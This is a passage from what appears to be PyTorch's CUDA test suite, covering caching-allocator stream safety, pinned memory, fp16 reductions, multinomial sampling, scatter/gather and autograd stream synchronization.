            ptr[0] = tmp.data_ptr()
        torch.cuda.current_stream().wait_stream(stream)
        # `tmp` is consumed on the current stream; record it so the allocator
        # does not hand its block out before the delayed copy below runs.
        tmp.record_stream(torch.cuda.current_stream())
        torch.cuda._sleep(int(50 * cycles_per_ms))  # delay the copy
        result.copy_(tmp)

    perform_copy()
    with torch.cuda.stream(stream):
        tmp2 = torch.cuda.FloatTensor(t.size())
        tmp2.zero_()
        self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used too soon')

    self.assertEqual(result.tolist(), [1, 2, 3, 4])

    # Check that the block will be re-used after the main stream finishes
    torch.cuda.current_stream().synchronize()
    with torch.cuda.stream(stream):
        tmp3 = torch.cuda.FloatTensor(t.size())
        self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
    """record_stream() on a view with a nonzero storage offset must protect
    the whole underlying block, not just the view's sub-range."""
    # See issue #27366
    # This test detects unexpected block reallocation. For reliable test,
    # the stream to allocate tensors is isolated. The allocator will not
    # reuse free blocks which were allocated from another stream.
    stream_alloc = torch.cuda.Stream()
    with torch.cuda.stream(stream_alloc):
        base = torch.cuda.FloatTensor([10, 10])
    # Record another stream on a shifted view tensor.
    view = base[5:]
    assert view.storage_offset() > 0
    stream_record = torch.cuda.Stream()
    with torch.cuda.stream(stream_record):
        torch.cuda._sleep(int(50 * get_cycles_per_ms()))
    view.record_stream(stream_record)
    # Delete those tensors to make the block free soon.
    data_ptr = base.data_ptr()
    del base, view
    # A new tensor should not be allocated to the block above.
    stream_alloc.synchronize()
    with torch.cuda.stream(stream_alloc):
        try_realloc = torch.cuda.FloatTensor([10, 10])
    self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
    """Yield a raw cudaStream_t created directly through the CUDA runtime.

    The stream is created with cudaStreamCreate on `device` and destroyed on
    exit, so tests can exercise wrapping a stream PyTorch does not own.
    """
    cudart = torch.cuda.cudart()
    stream = ctypes.c_ulonglong(0)
    # Pass the address of `stream` to cudart as a plain integer so the
    # runtime can fill in the created stream handle.
    stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
    stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
    with device:
        try:
            out = cudart.cudaStreamCreate(stream_p_int)
            self.assertEqual(out, 0)  # 0 == cudaSuccess
            self.assertNotEqual(stream.value, 0)
            yield stream.value
        finally:
            out = cudart.cudaStreamDestroy(stream.value)
            self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
    """Wrap a runtime-created cudaStream_t in torch.cuda.ExternalStream and
    check that the handle and device index round-trip."""
    dev = torch.cuda.device(0)
    with self._get_external_stream(dev) as raw_handle:
        wrapped = torch.cuda.streams.ExternalStream(raw_handle)
        self.assertEqual(raw_handle, wrapped.cuda_stream)
        self.assertEqual(wrapped.device.index, dev.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
    """Same as test_external_streams, but on a non-default device passed
    explicitly to ExternalStream."""
    dev = torch.cuda.device(1)
    with self._get_external_stream(dev) as raw_handle:
        wrapped = torch.cuda.streams.ExternalStream(raw_handle, device=dev)
        self.assertEqual(raw_handle, wrapped.cuda_stream)
        self.assertEqual(wrapped.device.index, dev.idx)
def test_noncontiguous_pinned_memory(self):
    """Pinning a non-contiguous tensor must preserve its contents (issue #3266)."""
    mat = torch.arange(0, 10).view((2, 5))
    transposed = mat.t()
    self.assertEqual(transposed, transposed.pin_memory())
def test_caching_pinned_memory(self):
    """Pinned-host allocator caching: blocks are re-used after free, but not
    while an in-flight async H2D copy still reads from them."""
    cycles_per_ms = get_cycles_per_ms()

    # check that allocations are re-used after deletion
    t = torch.FloatTensor([1]).pin_memory()
    ptr = t.data_ptr()
    del t
    t = torch.FloatTensor([1]).pin_memory()
    self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')

    # check that the allocation is not re-used if it's in-use by a copy
    gpu_tensor = torch.cuda.FloatTensor([0])
    torch.cuda._sleep(int(50 * cycles_per_ms))  # delay the copy
    gpu_tensor.copy_(t, non_blocking=True)
    del t
    t = torch.FloatTensor([1]).pin_memory()
    self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
    # Reading gpu_tensor syncs, so by now the copy must have landed.
    self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
    """Pinned-memory re-use guard across devices.

    The event that prevents a pinned block from being handed out again must
    be recorded on the device that performed the async copy (cuda:1 here),
    not on the current device at allocation time.
    """
    # checks that the events preventing pinned memory from being re-used
    # too early are recorded on the correct GPU
    cycles_per_ms = get_cycles_per_ms()

    t = torch.FloatTensor([1]).pin_memory()
    ptr = t.data_ptr()
    gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
    gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)

    with torch.cuda.device(1):
        torch.cuda._sleep(int(50 * cycles_per_ms))  # delay the copy
        gpu_tensor1.copy_(t, non_blocking=True)

    del t
    t = torch.FloatTensor([2]).pin_memory()
    # The delayed copy on cuda:1 still reads the old block; it must not be reused.
    self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')

    with torch.cuda.device(0):
        gpu_tensor0.copy_(t, non_blocking=True)

    self.assertEqual(gpu_tensor1[0], 1)
    self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
    """allocations delayed by a record_stream call should still be freed on
    an out-of-memory in cuda_malloc_retry. see issue #19219
    """
    stream = torch.cuda.Stream()

    with torch.cuda.stream(stream):
        y = torch.zeros(40 * 1024 * 1024, device='cuda')

    for _ in range(100):
        x = torch.empty(40 * 1024 * 1024, device='cuda')
        with torch.cuda.stream(stream):
            y += x
        # delays re-use of `x` until after all operations in `stream`
        x.record_stream(stream)
        del x

    # we've made a mess by allocating up to the device capacity. free any
    # cached blocks in case it affects future tests.
    torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
    """Dim-0 reduction over a (512, 8) tensor must not read out of bounds
    (regression test for #17040)."""
    ones = torch.ones(512, 8, dtype=torch.float32, device='cuda')
    torch.sum(ones, 0)
def test_sum_fp16(self):
    """fp16 sums: exact results up to the fp16 max (65504), accumulation in
    fp32 beyond it, and agreement with CPU on sparse random inputs."""
    zeros = torch.zeros(10, device='cuda', dtype=torch.float16)
    self.assertEqual(zeros.sum(), 0)

    ones = torch.ones(65504, device='cuda', dtype=torch.float16)
    self.assertEqual(ones.sum(), 65504)
    self.assertEqual(ones.sum(dtype=torch.float32), 65504)

    ones = torch.ones(65536, device='cuda', dtype=torch.float16)
    self.assertEqual(ones.sum(dtype=torch.float32), 65536)

    # Sparse Bernoulli input: full reduction must match the CPU reference.
    ref = torch.zeros(1203611).bernoulli_(0.0005)
    gpu_half = ref.to(device='cuda', dtype=torch.float16)
    self.assertEqual(gpu_half.sum().item(), ref.sum().item())

    # Same idea for a partial (dims 0 and 2) reduction on a 3-D input.
    ref = torch.zeros(100, 121, 80).bernoulli_(0.0005)
    gpu_half = ref.to(device='cuda', dtype=torch.float16)
    self.assertEqual(gpu_half.sum((0, 2)).float().cpu(), ref.sum((0, 2)))
def test_mean_fp16(self):
    """Mean of 65536 fp16 ones must be exactly 1 with either an fp16 or an
    fp32 accumulator (the element count exceeds fp16's integer range)."""
    for acc_dtype in (None, torch.float32):
        ones = torch.ones(65536, device='cuda', dtype=torch.float16)
        if acc_dtype is None:
            self.assertEqual(ones.mean(), 1)
        else:
            self.assertEqual(ones.mean(dtype=acc_dtype), 1)
def test_prod_large(self):
    """Global product reduction with a non-zero identity element."""
    # tests global reduction (should_global_reduce = true) in case of non-zero identity element
    real_ones = torch.ones(240000, device='cuda', dtype=torch.float32)
    self.assertEqual(real_ones.prod(), 1)
    # test for complex types. Note 240k is divisible by 4,
    # so (1j)**240000 == 1 for both complex dtypes.
    for complex_dtype in (torch.cfloat, torch.cdouble):
        units = torch.ones(240000, device='cuda', dtype=complex_dtype) * (0 + 1j)
        self.assertEqual(units.prod(), 1)
def test_multinomial_ext(self):
    """Regression cases for torch.multinomial on CUDA: zero-probability
    categories must never be sampled (issues #4858 and #13867).

    The seeds are fixed; do not reorder the RNG-consuming calls.
    """
    # Test two corner cases from older PyTorch (Issue #4858)
    freqs = torch.cuda.FloatTensor([
        0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
        0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
        0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
        0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
        0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
        0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
        0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
        0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
        0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
        0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
        0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
        0.00020504408166743815, 0.00012302644609007984, 0.0,
        0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
        0.0, 0.0])

    torch.cuda.manual_seed(11042)
    sample = torch.multinomial(freqs, 1000, True)
    # No drawn index may correspond to a zero-probability category.
    self.assertNotEqual(freqs[sample].min(), 0)

    p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
    p[:, 1] = 1
    torch.cuda.manual_seed(5214)
    r = torch.multinomial(p, 1)
    # Column 0 has probability 0, so every row must sample index 1.
    self.assertNotEqual(r.min().item(), 0)

    # test corner case from Issue #13867
    torch.cuda.manual_seed(33)
    probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
    samples = probs.multinomial(1000000, replacement=True)
    self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
    """Run torch.multinomial on invalid `probs` in a subprocess and assert
    that it dies with a device-side assertion.

    A subprocess is required because a device-side assert permanently
    poisons the CUDA context of the process that triggered it.

    Fix: `any(...)` now takes a generator instead of a materialized list,
    letting it short-circuit on the first matching message.
    """
    import subprocess
    try:
        p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
    with torch.random.fork_rng(devices=[0]):
        torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
        torch.cuda.synchronize()
    sys.exit(-1) # Should not be reached
except RuntimeError as e:
    sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
        out, err = p.communicate(timeout=10)
        p.wait(timeout=10)
    except subprocess.TimeoutExpired as e:
        p.kill()
        out, err = p.communicate()
    expected_messages = [
        'device-side assert triggered',  # CUDA
        'Assertion',  # CUDA
        'HSA_STATUS_ERROR_EXCEPTION',  # ROCm
        'Device-side assertion'  # ROCm
    ]
    self.assertTrue(any(msg in out or msg in err for msg in expected_messages))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
    """Each invalid probability vector (negative, inf, -inf, nan) must
    trigger a device-side assert; checked one subprocess per case."""
    invalid_prob_vectors = (
        [1., -1., 1.],
        [1., inf, 1.],
        [1., -inf, 1.],
        [1., 1., nan],
    )
    for probs in invalid_prob_vectors:
        self._spawn_test_multinomial_invalid_probs_cuda(probs)
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
    """Advanced indexing on a huge (15M x 45) tensor must match the CPU result."""
    source = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
    perm = torch.randperm(source.shape[0], device='cuda')
    gathered = source[perm]
    gathered_ref = source.cpu()[perm.cpu()]
    self.assertEqual(gathered.cpu(), gathered_ref)
def test_tensor_gather(self):
    """Run the shared gather test suite on CUDA tensors (bounds unchecked)."""
    def to_cuda(t):
        return t.cuda()
    AbstractTestCases._TestTorchMixin._test_gather(self, to_cuda, False)
def test_tensor_scatter(self):
    """Run the shared scatter_ test suite on CUDA tensors (bounds unchecked)."""
    def to_cuda(t):
        return t.cuda()
    AbstractTestCases._TestTorchMixin._test_scatter_base(self, to_cuda, 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
    """Run the shared scatter_add_ test suite on CUDA tensors (bounds unchecked)."""
    def to_cuda(t):
        return t.cuda()
    AbstractTestCases._TestTorchMixin._test_scatter_base(self, to_cuda, 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
    """Run the shared repeated-index scatter_add test on CUDA tensors."""
    def to_cuda(t):
        return t.cuda()
    AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, to_cuda)
def test_tensor_scatterFill(self):
    """Run the shared scatter_ fill-variant test suite on CUDA tensors."""
    def to_cuda(t):
        return t.cuda()
    AbstractTestCases._TestTorchMixin._test_scatter_base(
        self, to_cuda, 'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
    """Run the shared scatter_ test suite on CUDA tensors with complex dtypes."""
    def to_cuda(t):
        return t.cuda()
    AbstractTestCases._TestTorchMixin._test_scatter_base(
        self, to_cuda, 'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
    """Run the shared scatter_add_ test suite on CUDA tensors with complex dtypes."""
    def to_cuda(t):
        return t.cuda()
    AbstractTestCases._TestTorchMixin._test_scatter_base(
        self, to_cuda, 'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
    """Run the shared scatter_ fill-variant test suite on CUDA complex tensors."""
    def to_cuda(t):
        return t.cuda()
    AbstractTestCases._TestTorchMixin._test_scatter_base(
        self, to_cuda, 'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
    """Index initialization of THC_reduceAll at extreme uint8 values.

    For single-element tensors at the dtype's extremes, the returned argmax
    and argmin must both be index 0.
    """
    # Testing if THC_reduceAll received the correct index initialization.
    # This affects the result of THC_reduceAll operations at extreme values
    lowest = torch.cuda.ByteTensor([0])
    highest = torch.cuda.ByteTensor([255])
    expected_index = torch.cuda.LongTensor([0])[0]

    _, idx = lowest.max(dim=0)
    self.assertEqual(idx, expected_index)
    _, idx = highest.min(dim=0)
    self.assertEqual(idx, expected_index)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
    """Restoring per-device RNG states with set_rng_state_all must reproduce
    the exact same random draws on every device."""
    states = torch.cuda.get_rng_state_all()
    before0 = torch.cuda.FloatTensor(100, device=0).normal_()
    before1 = torch.cuda.FloatTensor(100, device=1).normal_()
    torch.cuda.set_rng_state_all(states)
    after0 = torch.cuda.FloatTensor(100, device=0).normal_()
    after1 = torch.cuda.FloatTensor(100, device=1).normal_()
    # Bitwise-identical draws expected: zero tolerance.
    self.assertEqual(before0, after0, atol=0, rtol=0)
    self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
    """Smoke test: the NVTX range/mark bindings exist and are callable."""
    # Just making sure we can see the symbols
    torch.cuda.nvtx.range_push("foo")
    torch.cuda.nvtx.mark("bar")
    torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
    """Exercise all three CUDA bincount code paths (shared / multi-block /
    global memory) against the CPU result, plus an int32 offset-overflow
    regression case."""
    # ensure CUDA code coverage
    input_size = (5000,)
    w = torch.randn(input_size, dtype=torch.double, device='cuda')
    w_cpu = w.cpu()

    # test shared memory impl
    t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
    self.assertEqual(t.cpu().bincount(), t.bincount())
    self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))

    # test multi block memory impl
    # see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
    t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
    self.assertEqual(t.cpu().bincount(), t.bincount())
    self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))

    # test global memory impl
    # see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
    t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
    self.assertEqual(t.cpu().bincount(), t.bincount())
    self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))

    t = torch.zeros([10], dtype=torch.int32, device='cuda')
    # 35488 * 65536 as int32 would cause overflow to negative value
    # giving negative bin offset
    t[0] = 35488
    counted = t.bincount(minlength=65536)
    self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
    """The norm of tiny fp16 values must stay strictly positive rather than
    underflowing to zero."""
    vals = torch.arange(25).cuda().float()
    vals /= 100000000
    half_vals = vals.half()
    self.assertGreater(half_vals.norm().item(), 0)
def test_norm_type_conversion(self):
    """0-"norm" (count of nonzeros) of 65536 fp16 ones, accumulated in fp32,
    must be exact — beyond fp16's integer range."""
    halves = torch.ones(65536).cuda().half()
    self.assertEqual(halves.norm(p=0, dtype=torch.float32), 65536)
# Test that wrap_with_cuda_memory_check successfully detects leak
# skip for ROCM. Look into #62533.
@skipIfRocm
def test_cuda_memory_leak_detection(self):
    """wrap_with_cuda_memory_check must pass on a leak-free function and
    fail, naming the right device, when a CUDA tensor is retained."""
    l = []

    @self.wrap_with_cuda_memory_check
    def no_leak():
        pass

    @self.wrap_with_cuda_memory_check
    def leak_gpu0():
        # Appending to the outer list keeps the tensor alive -> leak.
        l.append(torch.tensor(10, device=torch.device("cuda:0")))

    no_leak()

    with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 0"):
        leak_gpu0()

    if TEST_MULTIGPU:
        @self.wrap_with_cuda_memory_check
        def leak_gpu1():
            l.append(torch.tensor(10, device=torch.device("cuda:1")))

        with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 1"):
            leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
    """An exception raised inside assertLeaksNoCudaTensors must propagate
    out, not be swallowed by the leak check."""
    with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
        with self.assertLeaksNoCudaTensors():
            x = torch.randn(3, 1, device='cuda')
            y = torch.randn(2, 1, device='cuda')
            # Shape mismatch (3 vs 2) raises inside the leak-check context.
            z = x + y
def test_trilu_indices(self):
    """tril_indices / triu_indices on CUDA: compare against the shared
    reference cases, then against nonzero() of tril/triu masks."""
    for test_args in tri_tests_args:
        _compare_trilu_indices(self, *test_args, device='cuda')

    # test default options
    x = torch.ones(
        3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
    self.assertEqual(
        x.tril(0).nonzero().transpose(0, 1),
        torch.tril_indices(3, 3, device='cuda'))
    self.assertEqual(
        x.triu(0).nonzero().transpose(0, 1),
        torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
    """Compare tril/triu index generation against the reference on the
    shared set of large shapes."""
    for args in tri_large_tests_args:
        _compare_large_trilu_indices(self, *args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
    """Kernel grid-loop index must not overflow for numel just above 2**30."""
    # Issue #24309: In extreme cases, the loop variable could overflow and continue
    # the kernel loop with a negative index, causing a RuntimeError (invalid write):
    x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
    expected = x[0, 0, 0, 2**30]
    y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
    torch.cuda.synchronize()
    # The last element must be intact (kernel_size=1 pooling is identity).
    self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
    """numel() > INT_MAX must raise; numel() == INT_MAX must compute correctly."""
    # Make sure input.numel() > INT_MAX is handled:
    x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
    with self.assertRaisesRegex(RuntimeError, "integer out of range"):
        y = torch.nn.functional.avg_pool2d(x, kernel_size=1)

    # Issue #24309: In extreme cases, the loop variable could overflow and continue
    # the kernel loop with a negative index, causing a RuntimeError (invalid write):
    x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
    expected = x[0, 0, 0, 2**31 - 2]
    y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
    torch.cuda.synchronize()
    self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
    """Build an autograd Function whose backward asserts it runs on the same
    stream the forward ran on, then spins on that stream to widen races."""
    class MultiplyInStream(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x, val):
            ctx.val = val
            # Remember the forward stream so backward can check it.
            ctx.stream = torch.cuda.current_stream()
            return x * val

        @staticmethod
        def backward(ctx, grad):
            self.assertEqual(torch.cuda.current_stream(), ctx.stream)
            # delays the operation in the background stream
            torch.cuda._sleep(1000 * 5000)
            return grad * ctx.val, None

    return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
    """Stream semantics of backward(): grads used outside the backward
    stream context require a manual sync; grads used inside the ambient
    backward stream context do not."""
    default_stream = torch.cuda.current_stream()
    stream = torch.cuda.Stream()

    MultiplyInStream = self._make_multiply_in_stream()

    # Tests using grads outside the backward() stream context
    # See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
    x = torch.randn(5, 5, device='cuda', requires_grad=True)
    with torch.cuda.stream(stream):
        stream.wait_stream(default_stream)
        output = MultiplyInStream.apply(x, 2)
        output.sum().backward()
    # sync needed
    default_stream.wait_stream(stream)
    self.assertEqual(x.grad, torch.ones_like(x) * 2)
    self.assertEqual(torch.cuda.current_stream(), default_stream)

    # Tests that using grads in the same stream context as backward()
    # is safe regardless what streams bwd ops ran on
    bwd_ambient_stream = torch.cuda.Stream()
    x = torch.randn(5, 5, device='cuda', requires_grad=True)
    with torch.cuda.stream(stream):
        stream.wait_stream(default_stream)
        output = MultiplyInStream.apply(x, 3)
    with torch.cuda.stream(bwd_ambient_stream):
        bwd_ambient_stream.wait_stream(stream)
        output.sum().backward()
        # x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
        # The end of backward() should have synced "bwd_ambient_stream" with "stream"
        # so it should be safe to use x.grad here without any syncs.
        self.assertEqual(x.grad, torch.ones_like(x) * 3)
        self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
    """Backward through a graph whose forward spans several streams.

    Runs in-place and out-of-place accumulation variants, with x first used
    either on the ambient stream or on a side stream, and checks the final
    gradient (dL/dx = 2 + 3 = 5 per iteration).
    """
    MultiplyInStream = self._make_multiply_in_stream()

    class StreamModel(torch.nn.Module):
        def __init__(self):
            super(StreamModel, self).__init__()
            self.event = torch.cuda.Event()
            self.stream0 = torch.cuda.Stream()
            self.stream1 = torch.cuda.Stream()

        def forward(self, x, x_first_use_on_ambient):
            if x_first_use_on_ambient:
                x0 = x.clone()
            self.stream0.wait_stream(torch.cuda.current_stream())
            self.stream1.wait_stream(torch.cuda.current_stream())
            with torch.cuda.stream(self.stream0):
                if not x_first_use_on_ambient:
                    x0 = x.clone()
                y0 = MultiplyInStream.apply(x0, 2)
                self.event.record(stream=torch.cuda.current_stream())

            with torch.cuda.stream(self.stream1):
                y1 = MultiplyInStream.apply(x, 3)
                self.stream1.wait_event(self.event)
                return y0 + y1

    stream = torch.cuda.Stream()

    for x_first_use_on_ambient in (True, False):
        # the out_of_place=False, iters=1 case stresses if proper syncs are inserted
        # when grads are initially None and stolen by backward ops.
        for out_of_place, iters in ((True, 1),
                                    (False, 1),
                                    (False, 5)):
            with torch.cuda.stream(stream):
                x = torch.randn(5, 5, device='cuda', requires_grad=True)
                model = StreamModel().cuda()
                # The hook checks backward runs on the stream of x's first use.
                x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
                                                              stream if x_first_use_on_ambient else model.stream0))
                for p in model.parameters():
                    self.assertTrue(p.grad is None)
                for i in range(iters):
                    loss = model(x, x_first_use_on_ambient).sum()
                    if out_of_place:
                        x_grad = torch.autograd.grad((loss,), (x,))[0]
                    else:
                        loss.backward()
            # See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
            torch.cuda.current_stream().wait_stream(stream)

            if out_of_place:
                self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
            else:
                self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
    """CopyBackward (to()'s backward) must sync correctly with autograd's
    InputBuffer logic across devices, for both the single-use and the
    accumulate (two-use) paths."""
    # This function must run with non-default current streams on all devices, otherwise it's meaningless.
    # The intention is to test that to()'s backward (CopyBackward) interacts properly with the
    # synchronization logic in torch/csrc/autograd/input_buffer.cpp.
    dev0 = torch.device("cuda:0")
    dev1 = torch.device("cuda:1")

    # Unfortunately I need to make the tensors largeish.
    # Bigger tensors = longer D2D transfers = more likely to expose races.
    size = 2**26

    a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
    b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)

    # Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
    # This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
    to_backward_recipient = a * b
    s = to_backward_recipient.to(device="cuda:0").sum()
    torch.cuda.synchronize(device=dev0)
    torch.cuda.synchronize(device=dev1)
    s.backward()
    self.assertTrue(a.grad.sum().item() == size)
    self.assertTrue(b.grad.sum().item() == size)

    # Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
    # This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
    a.grad = None
    b.grad = None
    to_backward_recipient = a * b
    # Multiply by 2 here so to's backward creates gradient values that are different from the case above,
    # to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
    # with 1s by the case above
    s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
    s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
    torch.cuda.synchronize(device=dev0)
    torch.cuda.synchronize(device=dev1)
    s0.backward(retain_graph=True)
    s1.backward()
    self.assertTrue(a.grad.sum().item() == 4 * size)
    self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
    """Backward ops must sync with the stream that produced the incoming
    grad_tensors (the GraphRoot), even when backward runs on another stream."""
    # This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
    # The potential bug it targets is a race condition. The test uses multiple trials and
    # torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
    # but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
    # but failure does guarantee there is a bug.
    fwd_bwd_op_stream = torch.cuda.Stream()
    bwd_ambient_stream = torch.cuda.Stream()
    # We need these streams to be different otherwise the test is meaningless.
    self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)

    size = int(1e3)

    a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
    b = torch.full((size,), 3.0, device="cuda", requires_grad=True)

    # I don't think we need any manual record_streams below.
    # a and b remain in scope for the entire test.
    # c and grad remain in scope for each iteration, and there's a full sync between iterations.
    for trial in range(5):
        torch.cuda.synchronize()
        a.grad = b.grad = None
        with torch.cuda.stream(fwd_bwd_op_stream):
            c = a * b

        with torch.cuda.stream(bwd_ambient_stream):
            torch.cuda.synchronize()
            # Long-running dummy kernel on bwd_ambient_stream delays filling of grad
            torch.cuda._sleep(int(50 * get_cycles_per_ms()))
            # Fills grad on bwd_ambient_stream
            grad = torch.full((size,), float(trial + 1), device="cuda")

            # Bwd ops still run on fwd_bwd_ops_stream, so the following will likely fail if
            # bwd ops don't sync with bwd_ambient_stream before consuming grad.
            torch.autograd.backward(tensors=c, grad_tensors=grad)

            # See https://github.com/pytorch/pytorch/issues/47028
            # assertEquals below run on bwd_ambient_stream, so this test may also fail
            # if backward() fails to sync with bwd_ambient_stream at the end.
            # Synchronizing here works around the issue until a proper fix can be made.
            torch.cuda.synchronize()
            with torch.no_grad():
                self.assertEqual(a.grad, grad * b)
                self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
    """Autograd final callbacks must sync with all leaf streams and with the
    user-facing stream surrounding backward().

    Expected grads: e = (a*2) * (b*3) with a = b = 1, so dL/da = dL/db = 6.
    Fix: stash[1] holds b's grad clone, so compare it against
    torch.full_like(b, 6) rather than full_like(a, 6) (same shape here, but
    the reference tensor should match the leaf being checked).
    """
    # Tests if autograd callbacks sync properly with respect to leaf streams and
    # the user-facing stream surrounding backward(). If it fails, first suspect is
    # sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
    MultiplyInStream = self._make_multiply_in_stream()

    size = int(1e3)
    a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
    b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)

    s0 = torch.cuda.Stream()
    s1 = torch.cuda.Stream()
    s2 = torch.cuda.Stream()

    stash = []

    # sets up a nontrivial structure of leaf streams
    s0.wait_stream(torch.cuda.current_stream())
    with torch.cuda.stream(s0):
        c = MultiplyInStream.apply(a, 2)

    s1.wait_stream(torch.cuda.current_stream())
    with torch.cuda.stream(s1):
        d = MultiplyInStream.apply(b, 3)
